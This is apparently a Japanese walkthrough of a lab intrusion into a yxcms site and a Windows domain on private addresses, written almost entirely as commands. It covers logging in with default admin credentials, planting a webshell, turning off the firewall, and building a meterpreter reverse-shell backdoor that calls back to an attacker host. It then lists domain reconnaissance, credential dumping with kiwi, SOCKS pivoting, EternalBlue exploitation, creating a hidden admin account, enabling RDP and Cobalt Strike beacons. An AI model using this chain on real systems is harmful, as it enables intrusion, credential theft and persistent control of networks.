初期アクセスとWebshellの取得

管理画面へのログイン

# 管理画面URL: http://192.168.43.17/yxcms/index.php?r=admin
# ユーザー名: admin
# パスワード: 123456

ファイルアップロードの悪用

バックアップファイルbeifen.rarからWebアプリケーションのディレクトリ構造を特定

# シェルファイルのパス: /yxcms/protected/apps/default/view/default/webshell.php

権限維持と内部偵察

ファイアウォールの無効化

# Windowsファイアウォールの停止
netsh advfirewall set allprofiles state off

# 設定状態の確認
netsh advfirewall show allprofiles state

メータープリターの設定

# バックドアの生成
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o backdoor.exe

# ハンドラーの起動
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.43.33
set lport 10888
exploit

内部ネットワークの情報収集

chcp 65001              # 文字コード設定
route print             # ルートテーブル表示
net time /domain        # ドメインコントローラーの特定
net user /domain        # ドメインユーザーの列挙
ipconfig /all           # ネットワーク設定の詳細
net view                # ネットワークリソースの表示
net group "domain admins" /domain   # ドメイン管理者の確認

認証情報の抽出

# Kiwiモジュールの利用
load kiwi
creds_all              # 全認証情報の表示
creds_kerberos         # Kerberos認証情報の抽出

内部ネットワークへの拡張

ソケットプロキシの確立

# ルートの追加
run autoroute -s 192.168.52.0/24
run autoroute -p

# SOCKSプロキシの設定
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9080
set SRVHOST 127.0.0.1
run

脆弱性スキャンの実施

# 内部ネットワークのスキャン
nmap --script=vuln 192.168.52.141
nmap --script=vuln 192.168.52.143
nmap --script=vuln 192.168.52.138

MS17-010の悪用

# EternalBlueの利用
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.52.138
set COMMAND net user
exploit

ドメインコントローラーへのアクセス確立

# 管理者アカウントの作成
set COMMAND net user pentest P@ssw0rd123! /add
set COMMAND net localgroup administrators pentest /add

# リモートデスクトップの有効化
set COMMAND reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

SMB Beaconによる権限拡大

SMB Beaconを使用してドメインコントローラーへの持続的なアクセスを確立。管理者権限を持つ認証情報が必要であり、同じCobalt Strikeインスタンスで管理されているBeacon間でのみ接続可能。